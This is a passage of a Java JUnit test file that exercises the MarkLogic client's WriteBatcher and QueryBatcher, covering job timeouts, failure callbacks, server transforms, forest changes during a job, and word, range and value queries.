dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 1K documents for (int i = 0; i < 1000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with a large AwaitTermination. QueryBatcher queryBatcherbatchSize = dmManager.newQueryBatcher(querydef); queryBatcherbatchSize.withBatchSize(20); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); queryBatcherbatchSize.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherbatchSize.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); JobTicket jobTicket = dmManager.startJob(queryBatcherbatchSize); // Make sure to modify TimeUnit.TIMEUNIT.Method(duration) below before the assert queryBatcherbatchSize.awaitCompletion(3, TimeUnit.MINUTES); Calendar calAft; long after = 0L; long duration = 0L; long queryJobTimeoutValue = 0L; while(!queryBatcherbatchSize.isStopped()) { // do nothing. } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; queryJobTimeoutValue = TimeUnit.MINUTES.toSeconds(duration); if (queryBatcherbatchSize.isStopped()) { System.out.println("Duration is ===== " + queryJobTimeoutValue); System.out.println(batchResults.toString()); assertEquals("Number of batches should have been 50", batchResults.toString().split("\\|").length, 50); } //Clear the contents for next query host batcher object results. batchResults.delete(0, (batchResults.capacity() -1)); batchFailResults.delete(0, (batchFailResults.capacity() -1)); // Run a QueryBatcher with a small AwaitTermination. QueryBatcher queryBatcherSmallTimeout = dmManager.newQueryBatcher(querydef); queryBatcherSmallTimeout.withBatchSize(1000); queryBatcherSmallTimeout.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("QueryBatcher with 1000 batch size - Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherSmallTimeout.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); batchFailResults.append(throwable.getJobBatchNumber()); }); JobTicket jobTicketTimeout = dmManager.startJob(queryBatcherSmallTimeout); queryBatcherSmallTimeout.awaitCompletion(5, TimeUnit.MILLISECONDS); if (queryBatcherSmallTimeout.isStopped()) { System.out.println(batchResults.toString()); assertNotEquals("Number of batches should not have been 1", batchResults.toString().split("\\|").length, 5); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { assertTrue("Exceptions not found when query time out value reached", batchFailResults.toString().contains("Test has Exceptions")); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify awaitTermination method on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherFailures"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 10 K documents for (int i = 0; i < 10000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAwait = dmManager.newQueryBatcher(querydef); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); JobTicket jobTicket = dmManager.startJob(queryBatcherAwait); // Make sure to modify TimeUnit.MILLISECONDS.Method(duration) below before the assert queryBatcherAwait.awaitCompletion(30, TimeUnit.SECONDS); queryBatcherAwait.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcherAwait.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); Calendar calAft; long after = 0L; long duration = 0L; long quertJobTimeoutValue = 0L; while(!queryBatcherAwait.isStopped()) { // do nothing } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; quertJobTimeoutValue = TimeUnit.MILLISECONDS.toSeconds(duration); if (queryBatcherAwait.isStopped()) { System.out.println("Duration is " + quertJobTimeoutValue); if (quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35) { assertTrue("Job termination with awaitTermination passed within specified time", quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35); } else if (quertJobTimeoutValue > 35) { fail("Job termination with awaitTermination failed"); } } } @Test public void testServerXQueryTransform() throws IOException, ParserConfigurationException, SAXException, TransformerException, InterruptedException, XPathExpressionException { System.out.println("Running testServerXQueryTransform"); String transformFileDir = dataConfigDirPath + "/transforms/"; TransformExtensionsManager transMgr = client.newServerConfigManager().newTransformExtensionsManager(); ExtensionMetadata metadata = new ExtensionMetadata(); metadata.setTitle("Adding attribute xquery Transform"); metadata.setDescription("This plugin transforms an XML document by adding attribute to root node"); metadata.setProvider("MarkLogic"); metadata.setVersion("0.1"); // get the transform file from add-attr-xquery-transform.xqy File transformFile = new File(transformFileDir +"add-attr-xquery-transform.xqy"); FileHandle transformHandle = new FileHandle(transformFile); transMgr.writeXQueryTransform("add-attr-xquery-transform", transformHandle, metadata); ServerTransform transform = new ServerTransform("add-attr-xquery-transform"); transform.put("name", "Lang"); transform.put("value", "English"); String xmlStr1 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so foo</foo>"; String xmlStr2 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so bar</foo>"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(5); batcher.withTransform(transform); StringHandle handleFoo = new StringHandle(); handleFoo.set(xmlStr1); StringHandle handleBar = new StringHandle(); handleBar.set(xmlStr2); String uri = null; // Insert 10 documents for (int i = 0; i < 10; i++) { uri = "foo" + i + ".xml"; batcher.add(uri, handleFoo); } for (int i = 0; i < 10; i++) { uri = "bar" + i + ".xml"; batcher.add(uri, handleBar); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("foo OR bar"); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(5); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str); batchResults.append("|"); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); if (queryBatcher1.isStopped()) { // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Query results URI list length returned after transformation incorrect", res.length, 20); // Get a random URI, since the URIs returned are not ordered. Get the 3rd URI. assertTrue("URI returned not correct", res[2].contains("foo") || res[2].contains("bar")); // do a lookup with the first URI using the client to verify transforms are done. DOMHandle readHandle = readDocumentUsingDOMHandle(client, res[0], "XML"); String contents = readHandle.evaluateXPath("/foo/text()", String.class); // Verify that the contents are of xmlStr1 or xmlStr2. System.out.println("Contents are : " + contents); assertTrue("Lookup for a document from Callback using the client failed", xmlStr1.contains(contents) || xmlStr2.contains(contents)); } // release client client.release(); } /* * To test QueryBatcher functionality (errors if any) when a Forest is being removed and added during a start job. * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherWithForestRemoveAndAdd() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithForestRemoveAndAdd"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); setupAppServicesConstraint(testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 20K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(2000); queryBatcherAddForest.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getMessage()); }); JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(3, TimeUnit.MINUTES); // Now add a Forests to the database. createForest(testMultipleForest[1], testMultipleDB); createForest(testMultipleForest[2], testMultipleDB); while(!queryBatcherAddForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherAddForest.isStopped()) { if (batchResults!= null && !batchResults.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); System.out.print(batchResults.toString()); // We should be having 10 batches numbered 1 to 10. assertTrue("Batches not complete in results", batchResults.toString().contains("10")); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } // Reomove a forest. StringBuffer batchResultsRem = new StringBuffer(); StringBuffer batchFailResultsRem = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherRemoveForest = dmManager.newQueryBatcher(querydef); queryBatcherRemoveForest.withBatchSize(2000); queryBatcherRemoveForest.onUrisReady(batch-> { batchResultsRem.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherRemoveForest.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResultsRem.append("Test has Exceptions"); batchFailResultsRem.append("|"); batchFailResultsRem.append(throwable.getMessage()); }); JobTicket jobTicketRem = dmManager.startJob(queryBatcherRemoveForest); queryBatcherRemoveForest.awaitCompletion(3, TimeUnit.MINUTES); // Now remove a Forest from the database. detachForest(testMultipleDB, testMultipleForest[2]); deleteForest(testMultipleForest[2]); while(!queryBatcherRemoveForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherRemoveForest.isStopped()) { if (batchResultsRem!= null && !batchResultsRem.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); // We should be having 10 batches numbered 1 to 10. //TODO Add rest of the validations when feature complete. System.out.print(batchResultsRem.toString()); assertTrue("Batches not complete in results when forest removed", batchResultsRem.toString().contains("10")); } if (batchFailResultsRem!= null && !batchFailResultsRem.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResultsRem.toString()); assertTrue("Exceptions not found when forest removed", batchFailResultsRem.toString().contains("Test has Exceptions")); } } } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); //In case something asserts detachForest(testMultipleDB, testMultipleForest[2]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); deleteForest(testMultipleForest[2]); Thread.sleep(10000); } } /* * To test QueryBatcher's callback support with long lookup timefor the client object to do a lookup * Insert documents to validate the functionality. * Induce a long pause which exceeds awaitTermination time. * * @throws IOException * @throws InterruptedException */ @Test public void testBatchClientLookupTimeout() throws IOException, InterruptedException { System.out.println("Running testBatchClientLookupTimeout"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 2K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuffer batchFailResults = new StringBuffer(); StringBuilder ccBuf = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(200); queryBatcherAddForest.onUrisReady(batch-> { // Check only once if (ccBuf.toString().isEmpty()) { JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); try { // Simulate a large time in reading back the results Thread.sleep(40000); } catch (Exception e) { // TODO Auto-generated catch block System.out.println(e.getMessage()); } ccBuf.append(jh.get().toString().trim()); // The first read should exhaust the awaitTermination timeout. Buffer contains only one result. System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); } batchResults.append(batch.getJobBatchNumber()); batchResults.append("|"); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions"); batchFailResults.append("|"); batchFailResults.append(throwable.getMessage()); }); // Have a small awaitCompletion timeout for the batcher. JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherAddForest.isStopped()) { if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } assertTrue("Batches are available in results when they should not be.", batchResults.toString().isEmpty()); } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); } } /* * To test QQueryBatcher when WriteBatcher writes same document. Simulate a deadlock / resource contention. * @throws IOException * @throws InterruptedException */ /*public void testSimultaneousBothBatcherAccess() throws IOException, InterruptedException { System.out.println("Running testSimultaneousBothBatcherAccess"); clearDB(restServerPort); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuilder writebatchResults = new StringBuilder(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuffer querybatchResults = new StringBuffer(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getForestResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); querybatchFailResults.append(throwable.getMessage()); } ); // Trying to use a WriteBatcher on the same docId. WriteBatcher batcherTwo = dmManager.newWriteBatcher(); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; StringHandle handle = new StringHandle(); handle.set(jsonDoc); // Update contents to same doc uri. batcherTwo.withBatchSize(1); batcherTwo.add("/batcher-contraints11.json", handle); batcherTwo.flushAndWait(); JobTicket jobTicketWriteTwo = dmManager.startJob(batcherTwo); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitTermination(1, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { System.out.println("Query Batch Failed - Buffer Contents are:" + querybatchFailResults.toString()); fail("Test failed due to exceptions"); } if( querybatchResults != null && !querybatchResults.toString().isEmpty()) { // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } } }*/ @Test public void testQueryBatcherJobDetails() throws Exception { String testMultipleDB = "QHBJobDetaitDB"; String[] testMultipleForest = {"QHBJobDetaitDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testQueryBatcherJobDetails"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchDetails = new StringBuilder(); StringBuilder forestDetails = new StringBuilder(); StringBuilder jobDetails = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); // Batch details batchDetails.append(batch.getJobBatchNumber()) .append('|') .append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForestBatchNumber()); // Get the Forest details Forest forest = batch.getForest(); forestDetails.append(forest.getDatabaseName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getForestName()); // Get the Job details /*jobDetails.append(batch.getJobTicket().getJobId()) .append('|') .append(batch.getJobTicket().getJobType().name());*/ } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); String jobId = jobTicket.getJobId(); String jobName = jobTicket.getJobType().name(); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); // verify the Job and batch get method values. String[] batchDetailsArray = batchDetails.toString().split("\\|"); assertTrue("Job Batch Number not correct", Long.parseLong(batchDetailsArray[0]) > 0); assertTrue("Job Results So Far Number not correct", Long.parseLong(batchDetailsArray[1]) > 0); assertTrue("Forest Batch Number not correct", Long.parseLong(batchDetailsArray[2]) > 0); // Git Isue 124. For bytesMoved. assertTrue("Job Bytes Moved not correct", Long.parseLong(batchDetailsArray[3]) == 0); // verify the forest get method values. String[] forestDetailsArray = forestDetails.toString().split("\\|"); assertTrue("Database name returned from batch is not correct", forestDetailsArray[0].equalsIgnoreCase(dbName)); assertTrue("Forest name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[0]) || forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[1])); // verify the job ticket get method values. This needs to be implemented. /*String[] jobTicketArray = jobDetails.toString().split("\\|"); assertTrue("Job Id returned from batch is not correct", jobTicketArray[0].equalsIgnoreCase(jobId)); assertTrue("Job Type name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(jobName));*/ } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); clientTmp.release(); } } /* * These are test methods that verify that different query types work. * Testing - * Word query * range query * value query */ @Test public void testDifferentQueryTypes() throws Exception { String testMultipleDB = "QBtestDifferentQueryTypesDB"; String[] testMultipleForest = {"QBtestDifferentQueryTypesDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testDifferentQueryTypes"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); // Setup constraints on DB and wait for indexes to setup. setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; ServerConfigurationManager srvMgr = client.newServerConfigManager(); srvMgr.readConfiguration(); srvMgr.setQueryOptionValidation(true); srvMgr.writeConfiguration(); clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); // create query def StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); StructuredQueryDefinition queryWorddef = qb.word(qb.element("id"), "0026"); //Use WriteBatcher to write the some files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); //batcher.awaitCompletion(); StringBuilder batchWordResults = new StringBuilder(); StringBuilder batchWordFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(queryWorddef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchWordResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchWordFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher1.isStopped()) { // do nothing. } if (queryBatcher1.isStopped()) { if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. String[] res = batchWordResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a range query. StructuredQueryDefinition queryRangedef = qb.range(qb.element("popularity"), "xs:integer", Operator.GE, 4); QueryBatcher queryBatcher2 = dmManagerTmp.newQueryBatcher(queryRangedef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchRangeResults = new ArrayList<String>(); StringBuilder batchRangeFailResults = new StringBuilder(); queryBatcher2.onUrisReady(batch-> { for (String str : batch.getItems()) { batchRangeResults.add(str); //batchRangeResults.append(str) //.append('|'); } }); queryBatcher2.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchRangeFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher2); bJobFinished = queryBatcher2.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher2.isStopped()) { // do nothing. } if (queryBatcher2.isStopped()) { if (!batchRangeFailResults.toString().isEmpty() && batchRangeFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. assertTrue("No of documents returned in range query not correct", batchRangeResults.size() == 4); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints2.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints4.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a ValueQueryOnAttribute query. StructuredQueryDefinition valuequeyDef = qb.value(qb.elementAttribute(qb.element(new QName("http://cloudbank.com", "price")), qb.attribute("amt")), "0.1"); QueryBatcher queryBatcher3 = 